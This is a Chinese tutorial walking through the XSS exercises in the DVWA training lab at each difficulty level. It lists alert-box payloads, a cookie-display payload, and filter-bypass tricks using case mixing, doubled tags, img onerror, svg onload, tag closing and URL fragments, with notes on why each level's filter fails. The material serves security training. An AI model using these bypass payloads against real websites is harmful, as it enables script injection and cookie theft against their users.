DVWA靶场 XSS
目录
XSS(跨站脚本攻击)
payload
1、反射型XSS
2、存储型XSS
3、DOM型xss
XSS(跨站脚本攻击)
payload
<script>alert("xss success!")</script>
<script>alert(document.cookie)</script> 弹窗cookie
<Script>alert("xss success!")</script> 大小写混淆绕过<script>标签限制
<s<script>cript>alert("xss success!")</sc<script>ript> 双写<script>标签绕过
<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>
使用iframe标签嵌入网页
<img src=1 οnerrοr=alert("xsssuccess!")> 利用图片报错信息
<svg οnlοad=alert("xsssuccess!")> 利用svg标签 onload
#<script>alert("xss success!")</script> 利用注释绕过限制
xss</select><img src=1 οnerrοr=alert("xsssuccess!")> 闭合标签绕过限制
1、反射型XSS
(1)low
1、进入靶场,找到XSS Reflected,级别调到low级别
2、查看源代码发现没有任何过滤和防护措施,可以直接上payload
3、<script>alert("xss success!")</script>
4、<script>alert(document.cookie)</script>
(2)Medium
1、使用弹框payload进行XSS,发现代码输出到屏幕上,并没有执行
2、查看源代码,发现代码把<script>标签过滤了
3、大写<Script>标签进行绕过,<Script>alert("xss success!")</script>
4、成功进行XSS
5、也可以使用双写script标签的方法,绕过限制 <s<script>cript>alert("xss success!")</sc<script>ript>
(3)High
1、使用常规payload进行XSS,<script>alert("xss success!")</script>,没有成功,只显示了一个>
2、使用大小写绕过,<Script>alert("xss success!")</script>,结果一样
3、查看源代码,发现是将script标签中的字母全部替换成了空,script标签已经无法使用了
preg_replace 函数执行一个正则表达式的搜索和替换。
4、无法使用script标签就使用其他标签进行,使用iframe嵌入网页
<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>
可以发现代码已经执行,这里只不过被firefox给拦截了
5、使用img标签,利用图片报错信息进行XSS,<img src=1 οnerrοr=alert("xsssuccess!")>,这个payload中的提示语不能有空格
6、使用svg标签 <svg οnlοad=alert("xsssuccess!")>
impossible
通过多层验证和过滤不存在xss
2、存储型XSS
payload
(1)low
1、先测试一下
2、上payload,发现第一个提交框有长度限制,把长度值改的大一些
3、继续使用payload,<script>alert("xss success!")</script>
4、成功XSS
5、测试第二个提交框是否存在xss
6、成功xss
7、从其他页面在切换到此页面的时候,仍然会弹出xss弹窗,这就是存储型的xss具有持久性,如果不清楚数据库中的代码这个xss攻击将会一直存在
(2)medium
1、正常注入xss代码,发现代码被输出
2、查看源代码,发现message字段不存在注入,而name字段只是过滤了<script>标签
3、利用大小写混淆绕过限制,或者双写script标签
<Script>alert("xss success!")</script>
<s<script>cript>alert("xss success!")</sc<script>ript>
(3)high
1、正常注入是肯定不行了,直接查看源代码,发现只能从name字段注入,而且不能使用<script>标签,这时就想着使用<iframe> <img><svg>等标签
2、使用img标签
<img src=1 οnerrοr=alert("xsssuccess")>
3、使用iframe标签
<iframe src="https://www.baidu.com" name="xss" width="1000px height="1500px"></iframe>
(4)impossible
1、调到impossible级别后发现即使是存储型的xss也不再存在前面几个级别的弹窗,说明无注入点
3、DOM型xss
DOM(Document Object Model文档对象模型),DOM型xss是一种特殊类型的反射型xss,只不过它不用与服务端交互,它发生在客户端数据处理过程中。
(1)low
1、查看源码,发现无任何防护、过滤措施,直接在url中注入代码
2、<script>alert("xss success!")</script>XSS成功
(2)medium
1、直接注入js代码,没有任何反应
2、查看源代码,使用了stripos过滤<script,且不区分大小写,
3、无论是双写还是大小写都没有用了,查看一下前端代码,发现使用的是<select>和<option>标签
4、可以利用标签闭合,在接上payload来执行xss
(3)high
1、查看源码
2、使用注释绕过后端代码,不经过服务器而是直接浏览器执行注释的内容
#<script>alert("xss success!")</script>
(4)impossible
查看源码,不需要任何防护保护在客户端
DVWA靶场 XSS相关推荐
- 【CSRF02】跨站请求伪造——DVWA靶场实操(含CSRF+XSS协同攻击实验)
目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 Low难度 2.1 前戏 2.2 实验步骤 2.3 代码审计 3 Medium难度 3.1 前戏 3.2 实验思路 3.3 方法一:诱导点击 ...
- dvwa靶场的简单练习
此文章仅为记录自己打靶场的过程 一.dvwa靶场的搭建 (1)phpstudy的下载安装以及配置 下载phpstudy,官网链接:小皮面板(phpstudy) - 让天下没有难配的服务器环境! (xp ...
- DVWA靶场环境搭建_SQL注入模拟靶机
今天讲DVWA的两个重要方面:DVWA靶场环境搭建以及SQL注入模拟靶机 DVWA介绍:在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到 ...
- Linux Podman安装DVWA靶场环境
一.DVWA靶场环境简介 1.DVWA一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范 ...
- DVWA靶场通关笔记
文章目录 Brute Force 暴力破解 Low Medium High Impossible 防护总结: Command Injection 命令注入 危害: Low Medium High Im ...
- DVWA靶场——下载与安装(全)
下载地址 GitHub地址:https://github.com/digininja/DVWA 靶场介绍 DVWA是一款适合入门渗透测试的靶场,用来学习和熟悉技术所用到的,所以包含的漏洞类型比较全面, ...
- DVWA靶场系列1-环境搭建
文章目录 前言 一.DVWA是什么? 二.Kali2022.2下安装 检查完善 前言 基于Kali2022.2搭建的DVWA靶场环境 一.DVWA是什么? https://github.com/dig ...
- DVWA测试XSS跨站脚本攻击三种类型
Xss主要分为三类,反射型,DOM型.存储型. 反射型 反射型XSS的定义是.如果URL地址当中的恶意参数会直接被输出到页面中,导致攻击代码被触发,便称之为反射型XSS,如下图所 DOM型 DOM X ...
- DVWA之XSS (完整版)
List item DVWA之XSS 文章目录 DVWA之XSS *Reflected XSS* Security Level: Low Security Level: Medium 1.双写绕过 2 ...
最新文章
- 在监视器(Monitor)内部,是如何做线程同步的?程序应该做哪种级别的同步?
- window .bat
- redis的redisvCommand的%b
- 初学C语言,你的“行囊”需要准备什么呢?
- 2018程序员不能错过的编程挑战网站 Top10
- apache.camel_Apache Camel 3.1 – XML路由的快速加载
- mysql 安装盒子_Windows2008 装 MySQL 问题
- 前端学习(1707):前端系列javascript之promise
- 人之间的尊重是相互的_人与人之间真心是互换的尊重是相互的
- 3个原因告诉你,为什么选择HTML5大前端?
- 在eclipse中运行 carrot2 workbench
- 1400+款调色预设LR/PS/PR/FCPX/达芬奇lightroom滤镜LUT素材
- SI24R2H_2.4GHz无线发射与125KHZ接收一体芯片
- Java整合ORC识别验证码
- Keil黑色背景页面设置
- 【檀越剑指大厂--mysql】mysql基础篇
- 超越Framer的基础知识
- linux ssd iops测试,Linux系统硬盘的IOPS测试
- 索尼Android电视 安装第三方软件,解答索尼电视如何安装第三方软件
- python推荐引擎_THUDataPITranslation
热门文章
- keyevent常用键列表
- 别再恐惧 IP 协议(万字长文 | 多图预警)
- ArrayList常见练习题解析
- python更改保存路径,Jupyter Notebook更改保存文件的默认路径(方法汇总,亲测有效)...
- android 低电量卡,Android11 增加低电量通知
- 键盘与电脑识别问题?
- 为触屏手机而设计系列1——拇指操作的“热区/死角”与“控件尺寸”
- pyinstaller 打包exe 防反编译(加密)
- orale数据库的SQL查询
- 高等数学(拉格朗日乘子法):NOI 2012 骑行川藏